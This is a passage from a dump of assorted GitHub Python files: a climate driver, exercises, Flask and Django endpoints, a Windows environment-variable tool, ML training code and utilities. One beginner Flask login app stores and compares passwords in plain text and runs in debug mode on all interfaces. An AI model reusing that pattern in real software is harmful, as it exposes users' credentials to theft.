os.path.exists('output/'):\n    os.makedirs('output/')\n\nforcing = pd.read_csv('data/forcing_hindcast.csv')\nmod_time = forcing['year']\n\nclimate_sensitivity = 3.1\nocean_vertical_diffusivity = 3.5\naerosol_scaling = 1.1\n\nforcingtotal = forcing_total.forcing_total(forcing=forcing, alpha_doeclim=aerosol_scaling, l_project=False, begyear=mod_time[0], endyear=np.max(mod_time))\n\ndoeclim_out = doeclimF.doeclimF(forcingtotal, mod_time, S=climate_sensitivity, kappa=ocean_vertical_diffusivity)\n\ndoeclim_out.to_csv('output/doeclim_output.csv')","repo_name":"niharnandan/thesis","sub_path":"doeclim_driver.py","file_name":"doeclim_driver.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14217520256","text":"import random\nimport copy\n# Consider using the modules imported above.\n\nclass Hat:\n    def __init__(self, **kwargs):\n        self.contents = list()\n        self.initial_count = 0\n        for key, value in kwargs.items():\n            for i in range(value):\n                self.initial_count += 1\n                self.contents.append(key)\n\n\n    def draw(self, num):\n        chosen = list()\n\n        try:\n            for i in range(num):\n                index = random.randint(0, len(self.contents) - 1) if len(self.contents) - 1 > 0 else 0\n                chosen.append(self.contents[index])\n                self.contents.pop(index)\n        except IndexError:\n            return chosen\n        \n        return chosen\n\n\n\n# This module has some poor data structure choices, but they were required by the instructions.\n# Otherwise, the tests might not pass.\ndef experiment(hat, expected_balls, num_balls_drawn, num_experiments):\n    successes = 0\n    \n    for i in range(num_experiments):\n        expected = expected_balls.copy()\n        drawn = copy.deepcopy(hat).draw(num_balls_drawn)\n        for ball in drawn:\n            if ball in expected.keys():\n                expected[ball] -= 1\n                if expected[ball] == 0:\n                    del expected[ball]\n            if not bool(expected): # If the dictionary is empty it will evaluate to false\n                successes += 1\n                break\n\n    return successes / num_experiments","repo_name":"dangarmol/python-scientific-computing-fcc","sub_path":"Probability Calculator/prob_calculator.py","file_name":"prob_calculator.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1127982942","text":"from http import HTTPStatus\n\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt_extended import get_current_user, jwt_required\n\nfrom app.models import SocialAccount\n\nremove_social_account = reqparse.RequestParser()\nremove_social_account.add_argument(\n    \"social_name\", dest=\"social_name\", location=\"json\", required=True, type=str, help=\"Name of social service.\"\n)\n\n\nclass RemoveSocialAccount(Resource):\n    \"\"\"\n    Endpoint handler class for unlinking a social service from an account.\n    \"\"\"\n\n    @jwt_required()\n    def post(self):\n        social_name = remove_social_account.parse_args().get(\"social_name\")\n        user = get_current_user()\n        social_account = SocialAccount.query.filter_by(user_id=user.id, social_name=social_name).one_or_none()\n        if not social_account:\n            return {\"message\": \"no social account\"}, HTTPStatus.CONFLICT\n        social_account.delete()\n        return HTTPStatus.OK\n","repo_name":"UtkinVadim/Auth_sprint_2","sub_path":"src/app/api/remove_social_account.py","file_name":"remove_social_account.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39795673020","text":"import sys\nimport argparse\nfrom ctwin32 
import (\n ctypes,\n user,\n advapi,\n shell,\n HWND_BROADCAST,\n WM_SETTINGCHANGE,\n SMTO_NORMAL,\n REG_SZ,\n REG_EXPAND_SZ,\n KEY_READ,\n KEY_WRITE,\n )\n\n################################################################################\n\ndef env_var_root(system=False, access=KEY_READ):\n if system:\n pth = r\"SYSTEM\\CurrentControlSet\\Control\\Session Manager\"\n return advapi.RegOpenKeyEx(advapi.HKLM, pth, access)\n else:\n return advapi.HKCU\n\n################################################################################\n\ndef env_var_key(root, access=KEY_READ):\n return advapi.RegOpenKeyEx(root, \"Environment\", access)\n\n################################################################################\n\ndef is_persistent_env_var(name, system=False):\n with env_var_root(system) as root:\n with env_var_key(root) as key:\n result = False\n try:\n val, typ = advapi.RegQueryValueEx(key, name)\n result = (typ in (REG_SZ, REG_EXPAND_SZ)) and bool(val)\n except OSError:\n pass\n return result\n\n################################################################################\n\ndef broadcast_env_change():\n estr = ctypes.create_unicode_buffer(\"Environment\")\n user.SendMessageTimeout(\n HWND_BROADCAST,\n WM_SETTINGCHANGE,\n 0,\n ctypes.addressof(estr),\n SMTO_NORMAL,\n 500\n )\n\n################################################################################\n\ndef persist_env_var(name, value, system=False, do_broadcast=False):\n access = KEY_WRITE | KEY_READ\n with env_var_root(system, access) as root:\n with env_var_key(root, access) as key:\n if not value:\n advapi.RegDeleteValue(key, name)\n else:\n advapi.reg_set_str(key, name, value)\n if do_broadcast:\n broadcast_env_change()\n\n################################################################################\n\ndef persist_user_env_block(nv_dict, system=False):\n for n, v in nv_dict.items():\n persist_env_var(n, v, system, False)\n broadcast_env_change()\n\n################################################################################\n\ndef get_env_block(system=False):\n result = {}\n with env_var_root(system) as root:\n with env_var_key(root, KEY_READ) as key:\n for name, value, typ in advapi.reg_enum_values(key):\n if typ in (REG_SZ, REG_EXPAND_SZ):\n result[name] = value\n return result\n\n################################################################################\n\ndef parse_args():\n ape = argparse.ArgumentParser(\n description=\"set environment variables persistently (like setx)\"\n )\n ape.add_argument(\n \"-s\",\n \"--system\",\n action=\"store_true\",\n help=\"set system variable (as opposed to user variable)\"\n )\n ape.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"print final variables\"\n )\n ape.add_argument(\"name\", help=\"name of variable\")\n ape.add_argument(\n \"value\",\n help=\"value of variable (omitting it will delete the variable)\",\n nargs=\"?\",\n default=\"\",\n )\n return ape.parse_args()\n\n################################################################################\n\ndef main(name, value, system, verbose):\n persist_env_var(name, value, system, True)\n if verbose:\n print(f\"variables for {'system' if args.system else 'user'}:\")\n for name, value in get_env_block(args.system).items():\n print(f\" {name} = {value}\")\n\n################################################################################\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n # Setting system variables requires administrative privileges.\n if args.system and not 
advapi.running_as_admin():\n shell.elevate(sys.executable, *sys.argv)\n else:\n main(args.name, args.value, args.system, args.verbose)\n\n################################################################################\n","repo_name":"RoccoMatano/ctwin32","sub_path":"samples/senv.py","file_name":"senv.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"2961750459","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence\n\nimport attr\nfrom habitat.core.registry import registry\nfrom habitat.core.simulator import AgentState, ShortestPathPoint\nfrom habitat.core.utils import DatasetFloatJSONEncoder\nfrom habitat.datasets.pointnav.pointnav_dataset import (\n CONTENT_SCENES_PATH_FIELD,\n DEFAULT_SCENE_PATH_PREFIX,\n PointNavDatasetV1,\n)\nfrom habitat.tasks.nav.object_nav_task import (\n ObjectGoal,\n ObjectGoalNavEpisode,\n ObjectViewLocation,\n)\n\nif TYPE_CHECKING:\n from omegaconf import DictConfig\n\n\n@attr.s(auto_attribs=True)\nclass OVONObjectViewLocation(ObjectViewLocation):\n r\"\"\"OVONObjectViewLocation\n\n Args:\n raidus: radius of the circle\n \"\"\"\n radius: Optional[float] = None\n\n\n@attr.s(auto_attribs=True, kw_only=True)\nclass OVONEpisode(ObjectGoalNavEpisode):\n r\"\"\"OVON Episode\n\n :param children_object_categories: Category of the object\n \"\"\"\n children_object_categories: Optional[List[str]] = []\n\n @property\n def goals_key(self) -> str:\n r\"\"\"The key to retrieve the goals\"\"\"\n return f\"{os.path.basename(self.scene_id)}_{self.object_category}\"\n\n\n@registry.register_dataset(name=\"OVON-v1\")\nclass OVONDatasetV1(PointNavDatasetV1):\n r\"\"\"\n Class inherited from PointNavDataset that loads Open-Vocab\n Object Navigation dataset.\n \"\"\"\n episodes: List[OVONEpisode] = [] # type: ignore\n content_scenes_path: str = \"{data_path}/content/{scene}.json.gz\"\n goals_by_category: Dict[str, Sequence[ObjectGoal]]\n\n @staticmethod\n def dedup_goals(dataset: Dict[str, Any]) -> Dict[str, Any]:\n if len(dataset[\"episodes\"]) == 0:\n return dataset\n\n goals_by_category = {}\n for i, ep in enumerate(dataset[\"episodes\"]):\n dataset[\"episodes\"][i][\"object_category\"] = ep[\"goals\"][0][\n \"object_category\"\n ]\n ep = OVONEpisode(**ep)\n\n goals_key = ep.goals_key\n if goals_key not in goals_by_category:\n goals_by_category[goals_key] = ep.goals\n\n dataset[\"episodes\"][i][\"goals\"] = []\n\n dataset[\"goals_by_category\"] = goals_by_category\n\n return dataset\n\n def to_json(self) -> str:\n for i in range(len(self.episodes)):\n self.episodes[i].goals = []\n\n result = DatasetFloatJSONEncoder().encode(self)\n\n for i in range(len(self.episodes)):\n goals = self.goals_by_category[self.episodes[i].goals_key]\n if not isinstance(goals, list):\n goals = list(goals)\n self.episodes[i].goals = goals\n\n return result\n\n def __init__(self, config: Optional[\"DictConfig\"] = None) -> None:\n self.goals_by_category = {}\n super().__init__(config)\n self.episodes = list(self.episodes)\n\n @staticmethod\n def __deserialize_goal(serialized_goal: Dict[str, Any]) -> ObjectGoal:\n g = ObjectGoal(**serialized_goal)\n\n for vidx, view in enumerate(g.view_points):\n view_location = OVONObjectViewLocation(**view) # type: ignore\n view_location.agent_state = AgentState(**view_location.agent_state) # type: ignore\n g.view_points[vidx] = view_location\n\n return g\n\n def from_json(\n self, json_str: 
str, scenes_dir: Optional[str] = None\n    ) -> None:\n        deserialized = json.loads(json_str)\n        if CONTENT_SCENES_PATH_FIELD in deserialized:\n            self.content_scenes_path = deserialized[CONTENT_SCENES_PATH_FIELD]\n\n        if len(deserialized[\"episodes\"]) == 0:\n            return\n\n        if \"goals_by_category\" not in deserialized:\n            deserialized = self.dedup_goals(deserialized)\n\n        for k, v in deserialized[\"goals_by_category\"].items():\n            self.goals_by_category[k] = [self.__deserialize_goal(g) for g in v]\n\n        for i, episode in enumerate(deserialized[\"episodes\"]):\n            episode = OVONEpisode(**episode)\n            episode.episode_id = str(i)\n\n            if scenes_dir is not None:\n                if episode.scene_id.startswith(DEFAULT_SCENE_PATH_PREFIX):\n                    episode.scene_id = episode.scene_id[\n                        len(DEFAULT_SCENE_PATH_PREFIX) :\n                    ]\n\n                episode.scene_id = os.path.join(scenes_dir, episode.scene_id)\n\n            if episode.shortest_paths is not None:\n                for path in episode.shortest_paths:\n                    for p_index, point in enumerate(path):\n                        if point is None or isinstance(point, (int, str)):\n                            point = {\n                                \"action\": point,\n                                \"rotation\": None,\n                                \"position\": None,\n                            }\n\n                        path[p_index] = ShortestPathPoint(**point)\n\n            self.episodes.append(episode)  # type: ignore [attr-defined]\n","repo_name":"naokiyokoyama/ovon","sub_path":"ovon/dataset/ovon_dataset.py","file_name":"ovon_dataset.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21316763707","text":"# Xiaolan has an n x n board that starts with every piece white. Xiaolan\r\n# performs m operations; each operation flips the colour of every piece in\r\n# some rectangle (white pieces turn black, black pieces turn white).\r\n# Output the colour of every piece after all operations are done.\r\n# Input format\r\n# The first line contains two integers n, m separated by a space: the board\r\n# size and the number of operations.\r\n# Each of the next m lines contains four integers x1, y1, x2, y2 separated\r\n# by spaces, meaning the pieces in rows x1..x2 and columns y1..y2 have their\r\n# colours flipped.\r\n# Output format\r\n# Output n lines, each with n characters 0 or 1 for the colour at that\r\n# position: 0 for white, 1 for black.\r\n# The straightforward version below would time out; the difference-array\r\n# method underneath is used instead.\r\n# n,m = map(int,input().split())\r\n# chessboard = [[0]*n for _ in range(n)]\r\n# for _ in range(m):\r\n#     x1,y1,x2,y2 = map(int,input().split())\r\n#     for i in range(x1-1,x2):\r\n#         for j in range(y1-1,y2):\r\n#             chessboard[i][j] = 1 - chessboard[i][j]\r\n# for row in chessboard:\r\n#     print(''.join(map(str, row)))\r\nn, m = map(int, input().split())\r\n# Initialize an all-zero (n + 2) x (n + 2) 2-D array as the difference array\r\ndiff = [[0] * (n + 2) for _ in range(n + 2)]\r\n# Apply the m operations\r\nfor _ in range(m):\r\n    x1, y1, x2, y2 = map(int, input().split())\r\n    # Mark the operation's rectangle in the difference array\r\n    diff[x1][y1] += 1\r\n    diff[x1][min(y2 + 1, n + 1)] -= 1\r\n    diff[min(x2 + 1, n + 1)][y1] -= 1\r\n    diff[min(x2 + 1, n + 1)][min(y2 + 1, n + 1)] += 1\r\n# Compute the final board state via 2-D prefix sums\r\nfor i in range(1, n + 1):\r\n    for j in range(1, n + 1):\r\n        diff[i][j] += diff[i][j - 1] + diff[i - 1][j] - diff[i - 1][j - 1]\r\n        # A cell flipped an even number of times is 0, an odd number is 1\r\n        print(1 if diff[i][j] % 2 == 1 else 0, end='')\r\n    print()","repo_name":"Ww0225/pythonTest","sub_path":"棋盘.py","file_name":"棋盘.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
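The difference-array solution above turns each rectangle toggle into four corner updates plus one prefix-sum pass, so the whole job is O(n^2 + m) instead of O(n^2 * m). A stand-alone version with a small worked check (function name is mine):

```python
def toggle_count(n, ops):
    """Return the n x n board (1-indexed) after toggling each rectangle in ops."""
    diff = [[0] * (n + 2) for _ in range(n + 2)]
    for x1, y1, x2, y2 in ops:
        diff[x1][y1] += 1
        diff[x1][y2 + 1] -= 1
        diff[x2 + 1][y1] -= 1
        diff[x2 + 1][y2 + 1] += 1
    board = [[0] * (n + 1) for _ in range(n + 1)]
    for i in range(1, n + 1):
        for j in range(1, n + 1):
            diff[i][j] += diff[i][j - 1] + diff[i - 1][j] - diff[i - 1][j - 1]
            board[i][j] = diff[i][j] % 2  # odd toggle count -> black
    return board

b = toggle_count(2, [(1, 1, 2, 2), (1, 1, 1, 1)])
print(b[1][1:], b[2][1:])  # [0, 1] [1, 1] -- cell (1,1) was flipped twice
```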
import views\n\napp_name = 'todo'\n\nurlpatterns = [\n    path('vonly/', views.TodoVueOnlyTV.as_view(), name=\"vonly\"), # TemplateView\n\n    path('create/', views.TodoCV.as_view(), name=\"create\"), # CreateView\n    path('list/', views.TodoLV.as_view(), name=\"list\"), # ListView\n    path('<int:pk>/delete/', views.TodoDelV.as_view(), name=\"delete\"), # DeleteView\n\n    path('mixin/', views.TodoMOMCV.as_view(), name=\"mixin\"), # MultipleObjectMixin, CreateView\n    path('<int:pk>/delete2/', views.TodoDelV2.as_view(), name=\"delete2\"), # DeleteView\n]\n","repo_name":"HRPzz/Vue_and_Django","sub_path":"01_Vue2cdn_Bootstrap4cdn_Django2/02_DjTodo/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21037237739","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\nfrom pymongo import MongoClient\n\nclient = MongoClient('localhost', 27017)\ndb = client.dbprac\n\n\n# GET -> page / POST(id,pw) -> login\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    if request.method == 'GET':\n        return render_template('login.html')\n    else:\n        # Receive id and pw from the POST body.\n        id = request.form['id']\n        pw = request.form['pw']\n\n        # Look up a record where both id and pw match.\n        db_id = db.users.find_one({'id': id, 'pw': pw}, {'_id': False})\n\n        # If db_id exists\n        if db_id is not None:\n            return \"Login successful\"\n\n        # If db_id does not exist\n        else:\n            return \"Check your ID or password\"\n\n\n# POST(id,pw) -> sign up\n@app.route('/signup', methods=['POST'])\ndef signup():\n    # Receive id and pw from the POST body.\n    id = request.form['id']\n    pw = request.form['pw']\n\n    # Look up a record with a matching id.\n    db_id = db.users.find_one({'id': id}, {'_id': False})\n\n    # If a record with that id already exists\n    if db_id is not None:\n        print(\"This ID already exists\")\n\n    # Otherwise, store the new account.\n    else:\n        db.users.insert_one({'id': id, 'pw': pw})\n        print(\"Sign-up complete\")\n\n\nif __name__ == '__main__':\n    app.run('0.0.0.0', port=5000, debug=True)\n","repo_name":"skylermbang/Lectures-","sub_path":"hanghae99/project/dailyreport/app (1).py","file_name":"app (1).py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
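The login example above stores and compares passwords in plain text. A safer variant hashes them; this sketch uses werkzeug.security (which ships with Flask) and only mirrors the example's field names:

```python
from werkzeug.security import generate_password_hash, check_password_hash

def make_user(user_id, pw):
    # Store only the salted hash, never the raw password.
    return {"id": user_id, "pw": generate_password_hash(pw)}

def verify(user_doc, pw):
    return check_password_hash(user_doc["pw"], pw)

u = make_user("alice", "s3cret")
print(verify(u, "s3cret"), verify(u, "wrong"))  # True False
```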
self.PRIX_PAR_INGREDIENT * len(self.ingredients)\n        self.prix = self.PRIX_DE_BASE + prix_tot_ingredients\n\n\npizzas = [\n    Pizza(\"4 fromages\", 8.5,(\"brie\",\"emmental\",\"compté\",\"parmesan\"), True),\n    Pizza(\"Royales\", 12.0,(\"brie\",\"oignons\",\"merguez\",\"champignos\")),\n    Pizza(\"Orientale\", 11.0,(\"oeuf\",\"emmental\",\"sauce tomate\",\"jambon\")),\n    Pizza(\"4 saisons\", 13.0,(\"brie\",\"sauce tomate\",\"viande hachée\",\"parmesan\")),\n    Pizza(\"Végétarienne\", 9.0,(\"brie\",\"sauce tomate\",\"champignos\",\"parmesan\"), True),\n    Pizzapersonnalisee(),\n    Pizzapersonnalisee()\n    ]\n\n\nfor pizza in pizzas:\n    pizza.afficher()\n","repo_name":"Aliouatte/Programmation_orient-_objet","sub_path":"main_1.py","file_name":"main_1.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983040867","text":"\"\"\"\nBinary search (binary_search)\nExample 5. Given a list of n integers in ascending order,\nprint 1 if k is present in the list and 0 if it is not.\n\"\"\"\n\nimport sys\n\ndef solution(n_list, k):\n    found = False\n    left = 0\n    right = len(n_list)-1\n    result = 0\n    result_idx = ''\n\n    while left <= right:\n        mid = (left + right) // 2\n        if k == n_list[mid]:\n            result = n_list[mid]\n            result_idx = f'idx: {mid}'\n            found = True\n            break\n        elif k < n_list[mid]:\n            right = mid - 1\n        elif k > n_list[mid]:\n            left = mid + 1\n\n    if found:\n        print(result, result_idx)\n        return 1\n    else:\n        print(result, result_idx)\n        return 0\n\ndef init():\n    n, k = map(int, sys.stdin.readline().split())\n    n_list = list(map(int, sys.stdin.readline().split()))\n    print(solution(n_list, k))\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/code_lion/search_05.py","file_name":"search_05.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27364480995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.figure(figsize=(8,6))\nsalary = ('1500 or less','1500-3000','3000-4500','4500-6000','6000 or more')\nx_pos = np.arange(len(salary))\nfirst = [13,74,15,5,2]\ncurrent = [3,34,38,19,15]\nret1 = plt.bar(x_pos-0.1,first,0.2,color='b',alpha=0.8,label='first salary')\nret2 = plt.bar(x_pos+0.1,current,0.2,color='r',alpha=0.8,label='current salary')\nplt.xticks(x_pos,salary)\nplt.ylabel('The number of people')\nplt.title('First salary and current salary')\nplt.legend((ret1[0],ret2[0]),('first salary','current salary'))\ndef autolabel(rets):\n    \"\"\"\n    Attach a text label above each bar displaying its height\n    \"\"\"\n    for ret in rets:\n        height = ret.get_height()\n        plt.text(ret.get_x() + ret.get_width()/2.,1.01*height,'%d' % int(height), ha = 'center',va = 'bottom')\nautolabel(ret1)\nautolabel(ret2)\nplt.show()\n","repo_name":"daozl/james","sub_path":"code/bar/salary.py","file_name":"salary.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23672022838","text":"from enthought.pyface.api import ApplicationWindow, GUI\nfrom enthought.pyface.action.api import Action, MenuManager, MenuBarManager\nfrom enthought.pyface.action.api import StatusBarManager, ToolBarManager\n\n\nclass MainWindow(ApplicationWindow):\n    \"\"\" The main application window. 
\"\"\"\n\n ###########################################################################\n # 'object' interface.\n ###########################################################################\n\n def __init__(self, **traits):\n \"\"\" Creates a new application window. \"\"\"\n\n # Base class constructor.\n super(MainWindow, self).__init__(**traits)\n\n # Create an action that exits the application.\n exit_action = Action(name='E&xit', on_perform=self.close)\n\n # Add a menu bar.\n self.menu_bar_manager = MenuBarManager(\n MenuManager(exit_action, name='&File')\n )\n\n # Add some tool bars.\n self.tool_bar_managers = [\n ToolBarManager(\n exit_action, name='Tool Bar 1', show_tool_names=False\n ),\n\n ToolBarManager(\n exit_action, name='Tool Bar 2', show_tool_names=False\n ),\n\n ToolBarManager(\n exit_action, name='Tool Bar 3', show_tool_names=False\n ),\n ]\n\n # Add a status bar.\n self.status_bar_manager = StatusBarManager()\n self.status_bar_manager.message = 'Example application window'\n \n return\n\n\n# Application entry point.\nif __name__ == '__main__':\n # Create the GUI (this does NOT start the GUI event loop).\n gui = GUI()\n\n # Create and open the main window.\n window = MainWindow()\n window.open()\n\n # Start the GUI event loop!\n gui.start_event_loop()\n\n##### EOF #####################################################################\n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/TraitsGUI/examples/application_window.py","file_name":"application_window.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"27734910070","text":"from typing import Union\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Adam\nfrom torch.nn import L1Loss\nfrom torch.optim.lr_scheduler import ExponentialLR\n\nfrom core.model import CnnLSTM\n\nfrom settings import has_cuda\nfrom core.loss import *\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nsns.set_style(\"darkgrid\")\n\n\nclass CnnLstmTrainer:\n def __init__(self,time_step:int, out_conv_filters: int, conv_kernel: int, conv_padding: str, pool_size: int, pool_padding: str,\n lstm_hidden_unit: int, n_features: int, lr: float, loss: Union[L1Loss, RMSELoss, RLoss]):\n\n print(f\"[Model] Loading model\")\n self._model = CnnLSTM(out_conv_filters, conv_kernel, conv_padding, pool_size, pool_padding, lstm_hidden_unit,\n n_features,time_step=time_step)\n print(f\"[Model] model had been loaded\")\n\n if has_cuda:\n self._model.cuda()\n\n self._opt = Adam(self._model.parameters(), lr=lr)\n self._criterion = loss()\n self._criterion_name = self._criterion.__class__.__name__\n self._scheduler = ExponentialLR(self._opt, gamma=0.9)\n\n def train(self, train_loader: DataLoader, epochs: int, validation_loader: DataLoader,\n test_loader: Union[DataLoader, None], save_path: Path,\n scale: dict):\n print(f'[Train] Start to train')\n\n std = scale[\"std\"]\n mean = scale[\"mean\"]\n\n total_loss = []\n total_val_loss = []\n # total_acc = []\n\n # start update\n step = 0\n for epoch in range(epochs):\n\n tm_loss = []\n tm_val_loss = []\n # tm_acc = []\n\n # training proccess\n for idx, (x, y) in enumerate(train_loader):\n\n x = torch.transpose(x, dim0=1, dim1=2)\n\n # x_mean = torch.mean(x)\n # y_mean = torch.mean(y)\n #\n # x_std = torch.std(x)\n # y_std = torch.std(y)\n #\n # x = (x-x_mean)/x_std\n # y = (y-y_mean)/y_std\n\n if has_cuda:\n x = 
x.float().cuda()\n y = y.float().cuda()\n\n # # update\n self._opt.zero_grad()\n pred = self._model(x)\n # pred = pred*std+mean\n # y = y * std + mean\n loss = self._criterion(pred, y)\n loss.backward()\n self._opt.step()\n tm_loss.append(loss.item())\n if step % 150 == 0:\n print(f\"[{epoch + 1}/{epochs}] Epoch | Loss:{tm_loss[-1]}\")\n step += 1\n\n # self._scheduler.step()\n total_loss.append(np.mean(tm_loss))\n\n # start validation process\n for idx, (x, y) in enumerate(validation_loader):\n x = torch.transpose(x, dim0=1, dim1=2)\n\n # x_mean = torch.mean(x)\n # y_mean = torch.mean(y)\n #\n # x_std = torch.std(x)\n # y_std = torch.std(y)\n #\n # x = (x-x_mean)/x_std\n # y = (y-y_mean)/y_std\n\n if has_cuda:\n x = x.float().cuda()\n y = y.float().cuda()\n\n with torch.no_grad():\n pred = self._model(x)\n # pred = pred * std + mean\n # y = y * std + mean\n loss = self._criterion(pred, y)\n tm_val_loss.append(loss.item())\n total_val_loss.append(np.mean(tm_val_loss))\n print(f\"[{epoch + 1}/{epochs}] Epoch | Validation Loss:{np.array(total_val_loss).mean()}\")\n # end validation process\n\n # end update\n\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\n # start saving weights\n total_loss = np.array(total_loss)\n total_val_loss = np.array(total_val_loss)\n total_loss = 1 - total_loss if self._criterion_name == \"RLoss\" else total_loss\n total_val_loss = 1 - total_val_loss if self._criterion_name == \"RLoss\" else total_val_loss\n\n np.save(file=str(save_path.joinpath(\"train_loss.npy\")), arr=total_loss)\n np.save(file=str(save_path.joinpath(\"validation_loss.npy\")), arr=total_val_loss)\n torch.save(self._model.state_dict(), str(save_path.joinpath(\"model.pth\")))\n # end saving weights\n\n # start save loss plot\n plt.figure(figsize=(15, 9))\n plt.plot(np.arange(epochs) + 1, total_loss, color=colors[0], label=\"Train loss\")\n plt.plot(np.arange(epochs) + 1, total_val_loss, color=colors[1], label=\"Validation loss\")\n plt.title(f\"CNN-LSTM ({self._criterion_name})\", fontsize=18, fontweight='bold')\n plt.xlabel('epochs', fontsize=18)\n plt.ylabel('Loss', fontsize=18)\n plt.legend()\n plt.savefig(str(save_path.joinpath(\"plot\").joinpath(\"training_loss.png\")))\n # end save loss plot\n\n # start test\n\n test_loss = []\n val_pred = []\n val_true = []\n with torch.no_grad():\n for idx, (x, y) in enumerate(test_loader):\n x = torch.transpose(x, dim0=1, dim1=2)\n\n # x_mean = torch.mean(x)\n # y_mean = torch.mean(y)\n #\n # x_std = torch.std(x)\n # y_std = torch.std(y)\n #\n # x = (x-x_mean)/x_std\n # y = (y-y_mean)/y_std\n\n if has_cuda:\n x = x.float().cuda()\n y = y.float().cuda()\n\n # # update\n pred = self._model(x)\n pred = pred * std + mean\n y = y * std + mean\n loss = self._criterion(pred, y)\n\n val_pred.append(pred.cpu().numpy())\n val_true.append(y.cpu().numpy())\n test_loss.append(loss.item())\n\n val_pred = np.concatenate(val_pred, axis=0)\n val_true = np.concatenate(val_true, axis=0)\n\n val_pred = np.squeeze(val_pred, axis=-1)\n val_true = np.squeeze(val_true, axis=-1)\n\n # val_pred = np.squeeze(val_pred , axis=-1)\n # val_true = np.squeeze(val_true, axis=-1)\n\n test_loss_mean = np.array(test_loss).mean()\n test_loss_mean = 1 - test_loss_mean if self._criterion_name == \"RLoss\" else test_loss_mean\n\n s_val_pred = np.array(val_pred)\n s_val_true = np.array(val_true)\n\n np.save(str(save_path.joinpath(\"train_pred.npy\")), s_val_pred)\n np.save(str(save_path.joinpath(\"train_true.npy\")), s_val_true)\n\n predict = pd.DataFrame(val_pred)\n original = 
pd.DataFrame(val_true)\n\n        # start save prediction\n        plt.figure(figsize=(15, 9))\n        ax = sns.lineplot(x=original.index, y=original[0], label=\"Data\", color='royalblue')\n        ax = sns.lineplot(x=predict.index, y=predict[0], label=f\"Prediction\", color='tomato')\n        ax.set_title(f'Test Stock price (Test loss: {test_loss_mean})', size=14, fontweight='bold')\n        ax.set_xlabel(\"Days\", size=14)\n        ax.set_ylabel(\"Cost (USD)\", size=14)\n        ax.set_xticklabels('', size=10)\n\n        plt.savefig(str(save_path.joinpath(\"plot\").joinpath(\"prediction.png\")))\n        # end save prediction plot\n\n        # end test\n        print(f\"[Test] Final Test Loss: {test_loss_mean}\")\n","repo_name":"armin-azh/CNN-LSTM","sub_path":"core/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"29519063397","text":"\"\"\"Integration tests.\"\"\"\n\nimport requests\n\nfrom tests.integration.consts import api\n\n\ndef test_get_hello():\n    \"\"\"Get Hello Endpoint.\"\"\"\n    response = requests.get(api.HEALTH_CHECK)\n    assert response.status_code == 200, '\\nReason: {}\\nURL: {}'.format(\n        response.reason, response.url)\n    response_body = response.json()\n\n    assert 'status' in response_body\n    assert 'ok' in response_body['status']\n","repo_name":"rpapat/ows-myproduct","sub_path":"tests/integration/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9772626021","text":"\"\"\"Utilities to scan all Python files in a directory and\naggregate the names of all the imported packages\n\"\"\"\nimport argparse\nimport ast\nimport os\nfrom collections import Counter\nfrom typing import Dict, Iterable, List, Optional, Tuple\n\nfrom iscan.std_lib import separate_third_party_from_std_lib\n\n\nclass ImportScanner(ast.NodeVisitor):\n    \"\"\"Scanner to look for imported packages.\"\"\"\n    def __init__(self) -> None:\n        self.imports = []  # type: ignore\n\n    def visit_Import(self, node: ast.Import) -> None:\n        \"\"\"Extract imports of the form `import foo`.\n\n        >>> import_statement = 'import os.path.join as jn, datetime.datetime as dt'\n        >>> ast.dump(ast.parse(import_statement))\n        \"Module(body=[\n            Import(names=[alias(name='os.path.join', asname='jn'),\n                          alias(name='datetime.datetime', asname='dt')])\n        ])\"\n        \"\"\"\n        for alias in node.names:\n            self.imports.append(alias.name)\n        self.generic_visit(node)\n\n    def visit_ImportFrom(self, node: 